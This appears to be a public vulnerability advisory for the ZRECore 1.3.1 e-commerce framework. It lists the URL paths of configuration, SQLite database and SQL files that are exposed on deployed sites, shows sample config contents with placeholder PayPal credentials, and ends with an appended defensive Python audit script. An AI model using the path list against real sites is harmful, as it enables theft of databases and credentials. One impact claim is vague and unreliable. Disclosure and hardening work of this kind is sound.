- ####################################################################
- # Exploit Title : ZRECore 1.3.1 Database Config Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 14/02/2019
- # Vendor Homepage : zend.com
- # Software Download Link : github.com/zrecore/ZRECore/archive/master.zip
- # Software Information Link : npmjs.com/package/zrecore
- github.com/zrecore/ZRECore
- # Software Version : From 1.01 to 1.3.1
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-16 [ Configuration ] ~ CWE-200 [ Information Exposure ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- ZRECore - The most intuitive approach to e-commerce application development.
- This application provides a native Mobile and E-Commerce API to all types of PHP
- applications, including Wordpress, Drupal, Joomla, and many more.
- Built upon the Zend Framework MVC library, the ZRECore application provides a
- stable and easily modified e-commerce API you can use directly in any PHP project.
- ZRECore leverages various technologies, including Doctrine 2, Sqlite3, and jQuery
- in order to provide a powerful, yet intuitive code base that any PHP programmer
- can quickly understand and extend to suit their project needs.
- ####################################################################
- # Impact :
- ***********
- The configuration files of ZRECore 1.3.1 [ and other versions ] may potentially
- disclose sensitive information to remote attackers.
- ZRECore 1.3.1 stores its configuration in /application/configs/application.ini
- and in other folders. HTTP requests consisting of a single character will cause the software to
- disclose sensitive configuration information, including the password/database to the administrative web interface.
- This file is installed, by default, with world-readable and possibly world-writable permissions enabled.
- This may have some potentially serious consequences, as the configuration
- file also stores password information in plain text.
- This issue occurs because access controls on the configuration files are not properly set.
- An attacker can exploit this issue to retrieve potentially sensitive information.
- Attackers can access the config files via a URL request. This may aid in further attacks.
- ####################################################################
- # Database Config Disclosure Exploit :
- ********************************
- /application/configs/application.ini
- autoloadernamespaces.passwordHash = "PasswordHash" ;
- ; Database
- resources.db.adapter = "PDO_SQLITE"
- resources.db.params.dbname = APPLICATION_PATH "/../data/sqlite/data.sq3"
- resources.EntityManager.connection.path = APPLICATION_PATH "/../data/sqlite/data.sq3"
- resources.EntityManager.modelDir = APPLICATION_PATH "/models"
- resources.EntityManager.proxyDir = APPLICATION_PATH "/proxies"
- /application/configs/paypal.default.ini
- paypal.service = "express_checkout"
- paypal.api_username = "your_username"
- paypal.api_password = "your_password"
- paypal.api_signature = "your_api_signature"
- paypal.api_version = "63.0"
- paypal.authorizing_account_email = "your_paypal_email@example.com"
- paypal.endpoint_url = "https://api-3t.paypal.com/nvp"
- paypal.expresscheckout_url = "https://www.paypal.com/webscr"
- paypal.api_username = "your_username"
- paypal.api_password = "your_password"
- paypal.api_signature = "your_api_signature"
- paypal.authorizing_account_email = "your_paypal_email@example.com"
- /data/mysql/_install.sql
- /data/mysql/queueTransaction.sql
- /data/sqlite/_install.sql
- /data/sqlite/aclPermission.sql
- /data/sqlite/aclRole.sql
- /data/sqlite/category.sql
- /data/sqlite/comment.sql
- /data/sqlite/coupon.sql
- /data/sqlite/currency.sql
- /data/sqlite/data.sq3
- /data/sqlite/folder.sql
- /data/sqlite/item.sql
- /data/sqlite/itemCoupon.sql
- /data/sqlite/itemProperty.sql
- /data/sqlite/merchantGateway.sql
- /data/sqlite/order.sql
- /data/sqlite/orderCoupon.sql
- /data/sqlite/orderItem.sql
- /data/sqlite/orderService.sql
- /data/sqlite/orderStatusHistory.sql
- /data/sqlite/orderSubscription.sql
- /data/sqlite/packageLevel.sql
- /data/sqlite/page.sql
- /data/sqlite/post.sql
- /data/sqlite/postComment.sql
- /data/sqlite/property.sql
- /data/sqlite/propertyType.sql
- /data/sqlite/propertyValue.sql
- /data/sqlite/service.sql
- /data/sqlite/serviceCoupon.sql
- /data/sqlite/servicePackageLevel.sql
- /data/sqlite/status.sql
- /data/sqlite/subscription.sql
- /data/sqlite/subscriptionCoupon.sql
- /data/sqlite/subscriptionPackageLevel.sql
- /data/sqlite/subscriptionService.sql
- /data/sqlite/user.sql
- /data/sqlite/userAcl.sql
- /data/sqlite/userProfile.sql
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
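A defender-side check for the condition described under Impact, as an added example that is not part of the original advisory or of ZRECore's code: it walks a directory the web server serves, flags the `.ini`, `.sql` and `.sq3` files found there, reports world-readable or world-writable permission bits and credential-looking keys, and can strip the "other" permission bits. The function names, the key-name heuristic and the assumption that the scanned directory is the document root are illustrative.

```python
import os
import re
import stat

# Extensions taken from the file list in the advisory (.ini, .sql, .sq3).
SENSITIVE_EXT = {".ini", ".sql", ".sq3"}
# Assumed heuristic: an .ini key whose name ends in password/signature/secret.
SECRET_KEY = re.compile(r"^\s*[\w.]*(?:password|signature|secret)\s*=", re.I | re.M)


def audit_webroot(docroot):
    """Return (relative path, issues) for sensitive files under the served directory."""
    findings = []
    for base, _dirs, files in os.walk(docroot):
        for name in sorted(files):
            if os.path.splitext(name)[1].lower() not in SENSITIVE_EXT:
                continue
            path = os.path.join(base, name)
            mode = os.stat(path).st_mode
            issues = ["inside document root"]
            if mode & stat.S_IROTH:
                issues.append("world-readable")
            if mode & stat.S_IWOTH:
                issues.append("world-writable")
            if name.lower().endswith(".ini"):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if SECRET_KEY.search(fh.read()):
                        issues.append("plaintext credential key")
            findings.append((os.path.relpath(path, docroot), issues))
    return findings


def harden(docroot):
    """Clear all 'other' permission bits on flagged files; return the paths changed."""
    changed = []
    for rel, issues in audit_webroot(docroot):
        if "world-readable" in issues or "world-writable" in issues:
            path = os.path.join(docroot, rel)
            os.chmod(path, os.stat(path).st_mode & ~stat.S_IRWXO)
            changed.append(rel)
    return changed
```

Tightening permissions does not stop the web server from serving these files if it owns them; anything still reported as inside the document root needs to be moved out of it or denied by server configuration.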